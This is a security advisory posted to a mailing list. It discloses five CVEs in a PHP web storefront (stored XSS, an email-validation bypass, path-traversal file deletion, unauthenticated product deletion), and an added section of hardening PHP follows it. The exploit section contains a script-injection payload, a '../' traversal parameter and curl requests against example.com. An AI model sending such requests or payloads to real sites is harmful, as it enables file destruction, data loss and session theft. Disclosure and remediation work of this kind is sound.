Date: Wed, 02 Oct 2019 06:42:19 -0400
From: Akamai <larry0@...com>
To: Open Security <oss-security@...ts.openwall.com>
Subject: Multiple vulnerabilities in Online store system v1.0 Stored XSS and unauthenticated product deletions.

Title: Multiple vulnerabilities in Online store system v1.0: stored XSS and unauthenticated product deletions
Author: Larry W. Cashdollar @_larry0
Date: 2019-09-18
CVE-IDs: CVE-2019-8288 CVE-2019-8289 CVE-2019-8290 CVE-2019-8291 CVE-2019-8292
Download Site: https://www.abcprintf.com/view_download.php?id=17
Vendor: abcprintf
Vendor Notified: 2019-09-18
Vendor Contact: abcprintf@...il.com
Advisory: http://www.vapidlabs.com/advisory.php?v=210

Description:

"Online store system" is a drop-in, customizable electronic storefront. It has an administrative interface allowing user and product management.

Vulnerability:

The application contains stored XSS vulnerabilities throughout the form page user_view.php, as none of the variables are sanitized (HTML-encoded) before being presented back to the client. This can be exploited by a new user injecting cookie-stealing code into their registration form fields and waiting for an administrative user to navigate to the users panel.

CVE-2019-8288 (user_view.php, line 159):
echo '<td>'.$row['adidas_member_user'].'</td>';

CVE-2019-8289 (user_view.php, line 160):
echo '<td>'. $row['adidas_member_email'] . '</td>';

CVE-2019-8290
The registration form's requirements for the member email format can be bypassed by posting directly to sent_register.php, which does not repeat the check, allowing special characters to be included and an XSS payload to be injected into the stored email address.

CVE-2019-8291
The code in delete_file.php doesn't check whether the user has administrative rights, nor does it check for path traversal, allowing a '..' in the filename parameter to delete arbitrary files that the httpd process has permission to remove.

CVE-2019-8292
The code in delete_product.php doesn't check whether the user has administrative rights before allowing them to delete a product from the database.

Exploit Code:

In the requests below, cookie.txt holds the session cookie of an ordinary (non-administrative) registered user and is sent with -b.

1. Stored XSS (CVE-2019-8288, CVE-2019-8289): set the login name or email to
   "><script>alert(1);</script>
   and wait for an administrator to open the users panel (user_view.php).

2. Bypass the registration form's email format check (CVE-2019-8290) by posting directly to sent_register.php:
$ curl -s -b cookie.txt -X POST -d "username=jsmith&password=jsmith123&email=\"><script>alert(1);</script>%40email.com" http://example.com/pso/sent_register.php

3. Delete an arbitrary file via path traversal without administrative rights (CVE-2019-8291):
$ curl -s -b cookie.txt "http://example.com/pso/admin/delete_file.php?id=0&filename=../women.php"

4. Delete a product without administrative rights (CVE-2019-8292):
$ curl -s -b cookie.txt "http://example.com/pso/admin/product_delete.php?id=4"
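The following PHP is an added example of how the three weaknesses above (unencoded output in user_view.php, a client-side-only email check in sent_register.php, and missing authorization plus path containment in delete_file.php / delete_product.php) would be hardened. It is not code from the Online store system package or from the advisory. The $row field names come from the advisory's excerpt; the session flag $_SESSION['is_admin'], the upload directory path and the product table/column names are assumptions.

```php
<?php
// Added example: hardened versions of the patterns the advisory describes.
// Not the vendor's code. Assumed: $_SESSION['is_admin'] is set by the login
// code, uploads live under a fixed directory, products are in table `product`.

// 1. Output encoding for user_view.php (CVE-2019-8288 / CVE-2019-8289).
//    ENT_QUOTES also encodes the single quote, so values are safe inside
//    quoted HTML attributes, not only between tags.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_member_row(array $row): string {
    return '<tr><td>' . h($row['adidas_member_user']) . '</td>'
         . '<td>' . h($row['adidas_member_email']) . '</td></tr>';
}

// 2. Server-side email validation for sent_register.php (CVE-2019-8290).
//    A browser-side check on the form is bypassed by POSTing directly, so the
//    same rule has to be enforced here. Validation does not replace encoding
//    on output; both are applied.
function valid_email(string $email): bool {
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// 3. Authorization gate for every script under admin/ (CVE-2019-8291 / -8292).
//    Assumes the login code sets $_SESSION['is_admin'] = true for admins only.
function require_admin(): void {
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// 4. Path containment for delete_file.php (CVE-2019-8291).
//    basename() drops any directory component (so "../women.php" becomes
//    "women.php"), and the realpath() prefix check refuses anything that still
//    resolves outside the upload directory (symlinks included).
function safe_unlink(string $upload_dir, string $filename): bool {
    $base = realpath($upload_dir);
    if ($base === false) {
        return false;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . basename($filename));
    if ($target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($target)) {
        return false;
    }
    return unlink($target);
}

// 5. delete_product.php: authorization first, then a parameterized query.
//    Table and column names are assumptions.
function delete_product(PDO $db, string $id): bool {
    require_admin();
    $stmt = $db->prepare('DELETE FROM product WHERE id = :id');
    return $stmt->execute([':id' => (int) $id]);
}

// Stand-alone check from the command line with the advisory's payload
// (constructed input, not data from a real installation).
if (PHP_SAPI === 'cli') {
    $payload = '"><script>alert(1);</script>@email.com';
    $row = ['adidas_member_user' => 'jsmith', 'adidas_member_email' => $payload];
    echo render_member_row($row), PHP_EOL;      // payload rendered as text, not markup
    var_dump(valid_email($payload));             // registration rejected server-side
    var_dump(valid_email('jsmith@example.com'));
}
```

In the admin scripts the calling order is session_start(); require_admin(); and only then safe_unlink('/var/www/pso/uploads', $_GET['filename']) or delete_product($db, $_GET['id']); a 403 before any state change is the point, since the advisory's requests never needed admin rights at all.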